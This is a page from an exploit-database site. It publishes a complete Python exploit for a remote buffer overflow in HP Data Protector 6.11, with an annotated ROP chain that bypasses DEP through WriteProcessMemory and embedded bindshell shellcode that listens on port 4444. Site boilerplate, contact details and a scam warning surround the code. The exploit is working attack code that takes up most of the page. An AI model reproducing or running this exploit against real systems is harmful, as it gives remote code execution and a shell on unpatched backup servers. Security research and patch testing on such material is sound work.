0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

HP Data Protector 6.11 Remote Buffer Overflow + DEP Bypass

Author

muts

Risk

[

Security Risk Unsored

]

0day-ID

Category

Date add

Platform

#!/usr/bin/python
# HP Data Protector 6.11 Remote Buffer Overflow
# Tested on Windows 2003 R2 + DEP Enabled
# Authors: muts & dookie
# Reference: http://www.exploit-db.com/exploits/17458/
# Reference: http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities
# http://www.offensive-security.com/0day/hp-dataprotector.py.txt
 
import struct, socket, sys
target = sys.argv[1]
 
# bindshell - port 4444
shellcode = ("\xbf\x83\x75\x7f\xdd\xdb\xc8\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x56\x31\x7e\x13\x03\x7e\x13\x83\xee\x7f\x97\x8a\x21\x97\xd1"
"\x75\xda\x67\x82\xfc\x3f\x56\x90\x9b\x34\xca\x24\xef\x19\xe6"
"\xcf\xbd\x89\x7d\xbd\x69\xbd\x36\x08\x4c\xf0\xc7\xbc\x50\x5e"
"\x0b\xde\x2c\x9d\x5f\x00\x0c\x6e\x92\x41\x49\x93\x5c\x13\x02"
"\xdf\xce\x84\x27\x9d\xd2\xa5\xe7\xa9\x6a\xde\x82\x6e\x1e\x54"
"\x8c\xbe\x8e\xe3\xc6\x26\xa5\xac\xf6\x57\x6a\xaf\xcb\x1e\x07"
"\x04\xbf\xa0\xc1\x54\x40\x93\x2d\x3a\x7f\x1b\xa0\x42\x47\x9c"
"\x5a\x31\xb3\xde\xe7\x42\x00\x9c\x33\xc6\x95\x06\xb0\x70\x7e"
"\xb6\x15\xe6\xf5\xb4\xd2\x6c\x51\xd9\xe5\xa1\xe9\xe5\x6e\x44"
"\x3e\x6c\x34\x63\x9a\x34\xef\x0a\xbb\x90\x5e\x32\xdb\x7d\x3f"
"\x96\x97\x6c\x54\xa0\xf5\xf8\x99\x9f\x05\xf9\xb5\xa8\x76\xcb"
"\x1a\x03\x11\x67\xd3\x8d\xe6\x88\xce\x6a\x78\x77\xf0\x8a\x50"
"\xbc\xa4\xda\xca\x15\xc4\xb0\x0a\x99\x11\x16\x5b\x35\xc9\xd7"
"\x0b\xf5\xb9\xbf\x41\xfa\xe6\xa0\x69\xd0\x91\xe6\xa7\x00\xf2"
"\x80\xc5\xb6\xe5\x0c\x43\x50\x6f\xbd\x05\xca\x07\x7f\x72\xc3"
"\xb0\x80\x50\x7f\x69\x17\xec\x69\xad\x18\xed\xbf\x9e\xb5\x45"
"\x28\x54\xd6\x51\x49\x6b\xf3\xf1\x00\x54\x94\x88\x7c\x17\x04"
"\x8c\x54\xcf\xa5\x1f\x33\x0f\xa3\x03\xec\x58\xe4\xf2\xe5\x0c"
"\x18\xac\x5f\x32\xe1\x28\xa7\xf6\x3e\x89\x26\xf7\xb3\xb5\x0c"
"\xe7\x0d\x35\x09\x53\xc2\x60\xc7\x0d\xa4\xda\xa9\xe7\x7e\xb0"
"\x63\x6f\x06\xfa\xb3\xe9\x07\xd7\x45\x15\xb9\x8e\x13\x2a\x76"
"\x47\x94\x53\x6a\xf7\x5b\x8e\x2e\x07\x16\x92\x07\x80\xff\x47"
"\x1a\xcd\xff\xb2\x59\xe8\x83\x36\x22\x0f\x9b\x33\x27\x4b\x1b"
"\xa8\x55\xc4\xce\xce\xca\xe5\xda")
 
wpm = "\x55\x23\xe4\x77"        # 77E42355 WriteProcessMemory - Win2k3 
wpm += "\x50\xd0\x4b\x00"       # 004bd050 omniinet.exe - Return after WPM 
wpm += "\xff\xff\xff\xff"       # hProcess 
wpm += "\x50\xd0\x4b\x00"       # 004bd050 omniinet.exe - Address to Patch 
wpm += "\x41\x41\x41\x41"       # lpBuffer placeholder (Shellcode Address) 
wpm += "\x42\x42\x42\x42"       # nSize placeholder (Shellcode Size)  00001000
wpm += "\x38\xd4\x4b\x00"       # 004BD438 omniinet.exe - Pointer for Written Bytes 
 
# pre
packet = ("\x00\x00\x27\xCA\xFF\xFE\x32\x00\x00\x00\x20\x00\x61\x00\x00\x00"
"\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00"
"\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x32\x00\x30\x00\x00\x00"
"\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00"
"\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00"
"\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00")
 
# padding to EIP
packet +="A"* 2004
# Get a copy of ESP into a register for safekeeping
packet +="\x1f\x59\x37\x7c" # 0x7c37591f  PUSH ESP # ADD EAX,DWORD PTR DS:[EAX] # ADD CH,BL # INC EBP # OR AL,59 # POP ECX # POP EBP # RETN
packet += "\x44" * 4  # junk to pop into EBP
 
# Jump over the WPM parameters
packet += "\xfe\x9b\x35\x7c"  # 0x7c359bfe :  # ADD ESP,20 # RETN
packet += wpm
packet += "\x44" * 4   # filler
 
# Get EAX to point at our shellcode on the stack and overwrite the placeholder
packet += "\x40\xa0\x35\x7c"  # 0x7c35a040 :  # MOV EAX,ECX # RETN 
packet += "\x1c\x3b\x37\x7c"  # 0x7c373b1c :  # ADD EAX,100 # POP EBP # RETN
packet += "\x44" * 4  # filler
packet += "\xd4\x3d\x43\x00"  # 0x00433dd4 :  # MOV DWORD PTR DS:[ECX+18],EAX # POP EBP # RETN    ** [omniinet.exe]
packet += "\x44" * 4  # filler
 
# Craft the shellcode size in EAX and overwrite the placeholder
packet += "\x2e\x40\x34\x7c"  # 0x7c34402e :  # POP EDX # RETN    ** [MSVCR71.dll]
packet += "\x59\x3d\x41\x41"  #  Value to SUB from EAX
packet += "\x23\x62\x37\x7c"  # 0x7c376223 :  # POP EAX # RETN    ** [MSVCR71.dll]
packet += "\x41\x41\x41\x41"  # To be the sub-ee 41413D59
packet += "\xe9\xfa\x36\x7c"  # 0x7c36fae9 :  # SUB EAX,EDX # POP ESI # RETN    ** [MSVCR71.dll]
packet += "\x44" * 4  # filler
packet += "\x69\x60\x37\x7c"  # 0x7c376069 :  # MOV DWORD PTR DS:[ECX+1C],EAX # POP EDI # POP ESI # POP EBX # RETN    ** [MSVCR71.dll]
packet += "\x44" * 12  # filler
 
# Point ESP to WPM and the stack and return
packet += "\x40\xa0\x35\x7c"  # 0x7c35a040 :  # MOV EAX,ECX # RETN    ** [MSVCR71.dll]
packet += "\x66\x61\x43\x00"  # 0x00436166 :  # ADD EAX,2 # POP EBP # RETN    ** [omniinet.exe]
packet += "\x44" * 4  # filler
packet += "\x66\x61\x43\x00"  # 0x00436166 :  # ADD EAX,2 # POP EBP # RETN    ** [omniinet.exe]
packet += "\x44" * 4  # filler
packet += "\x66\x61\x43\x00"  # 0x00436166 :  # ADD EAX,2 # POP EBP # RETN    ** [omniinet.exe]
packet += "\x44" * 4  # filler
packet += "\x66\x61\x43\x00"  # 0x00436166 :  # ADD EAX,2 # POP EBP # RETN    ** [omniinet.exe]
packet += "\x44" * 4  # filler
packet += "\x05\x8b\x34\x7c"  # 0x7c348b05 :  # XCHG EAX,ESP # RETN    ** [MSVCR71.dll]
packet += "\x45" * 8
packet +="\x90" *120
packet += shellcode
packet +="C"* 980000
# post
packet +=("\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00"
"\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00"
"\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00"
"\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00"
"\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00"
"\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00")
 
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((target, 5555))
sock.send(packet)
sock.close()



#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

HP Data Protector 6.11 Remote Buffer Overflow + DEP Bypass

Report Error

Report Error